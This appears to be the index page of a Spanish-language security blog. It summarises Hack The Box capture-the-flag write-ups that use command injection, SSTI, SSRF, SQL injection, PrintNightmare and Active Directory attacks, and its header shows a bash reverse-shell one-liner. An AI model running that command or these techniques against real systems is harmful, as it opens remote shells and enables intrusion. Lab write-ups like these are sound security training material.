sckull - blog
bash -i >& /dev/tcp/localhost/1337 0>&1
Hack The Box - Devzat
· 鉁嶏笍 sckull
devzat-chat command injection influxDB go
Devzat presenta un sitio web donde identificamos una vulnerabilidad de 'Command Injection', tambien, se expone el chat Devzat por SSH donde obtuvimos informaci贸n acerca de la base de datos y la versi贸n en Desarrollo del chat. Explotamos una vulnerabilidad en InfluxDB lo que nos permiti贸 acceder a un segundo usuario. Finalmente escalamos privilegios analizando el codigo fuente de la version en Desarrollo, lo que nos permiti贸 realizar la lectura de archivos como root y obtener acceso por SSH.
Hack The Box - Devzat
Hack The Box - Driver
· 鉁嶏笍 sckull
scf winrm printnightmare powershell responder winpeas
En driver encontramos un sitio web que nos permite subir archivos a un recurso compartido de SMB, utilizamos un archivo sfc lo que nos permiti贸 obtener el hash de un primer usuario y acceso por WinRM. Finalmente escalamos privilegios explotando la vulnerabilidad del servicio spool con PrinterNightmare.
Hack The Box - Driver
Hack The Box - Bolt
· 鉁嶏笍 sckull
ssti flask docker passbolt webmail gpg2john john
En Bolt analizamos una imagen de docker donde descubrimos una vulnerabilidad SSTI en una aplicaci贸n de Flask, esto nos permitio el acceder al primer usuario. Credenciales almacenadas nos permitieron obtener acceso a un segundo usuario. Finalmente obtuvimos en texto plano las credenciales del superusuario con una clave privada en una extensi贸n de Google Chrome.
Hack The Box - Bolt
Hack The Box - Forge
· 鉁嶏笍 sckull
ssrf ftp sudo privesc pdb python
En Forge encontramos una vulnerabilidad SSRF que nos permiti贸 acceder por el servicio FTP donde encontramos una clave privada que nos dio acceso por SSH. Finalmente escalamos privilegios tras la ejecuci贸n de un script de python que utiliza PDB, haciendo que este gen茅re un error para obtener una shell como root.
Hack The Box - Forge
Hack The Box - Previse
· 鉁嶏笍 sckull
command injection john path
Previse presenta un sitio web donde encontramos un backup lo que nos llev贸 a 'Command Injection'. Obtuvimos acceso a un segundo usuario crackeando el hash de la base de datos del sitio. Finalmente escalamos privilegios modificando la variable PATH..
Hack The Box - Previse
Hack The Box - Writer
· 鉁嶏笍 sckull
sqli postfish sqlmap apt flask django smb
En Writer encontramos una vulnerabilidad 'SQL Injection' que nos permiti贸 obtener el codigo fuente del sitio, para luego realizar 'Command Injection' y acceder a la maquina. Credenciales para la base de datos nos dieron acceso a un siguiente usuario. Por medio de Postfish obtuvimos acceso a un segundo usuario. Finalmente escalamos privilegios utilizando un archivo de configuracion para APT.
Hack The Box - Writer
Hack The Box - Intelligence
· 鉁嶏笍 sckull
dnsscan exiftool password-spraying smb crackmapexec adidns krbrelayx responder bloodhound gmsadumper impacket
En Intelligence realizamos una enumeracion de usuarios en los metadatos de PDFs para luego realizar 'Password Spraying' lo que nos dio acceso a un primer usuario. Encontramos un script en un recurso de samba lo que nos permiti贸 obtener el hash de un segundo usuario tras ejecutar Responder y krbrelayx. Bloodhound nos mostr贸 que uno de los usuarios tiene la caracteristica de leer constrase帽as de cuentas gMSA, este ultimo tambien tiene caracteristicas 'Delegation' sobre el DC, con esta informacion obtuvimos acceso como administrador con gMSADumper y impacket.
Hack The Box - Intelligence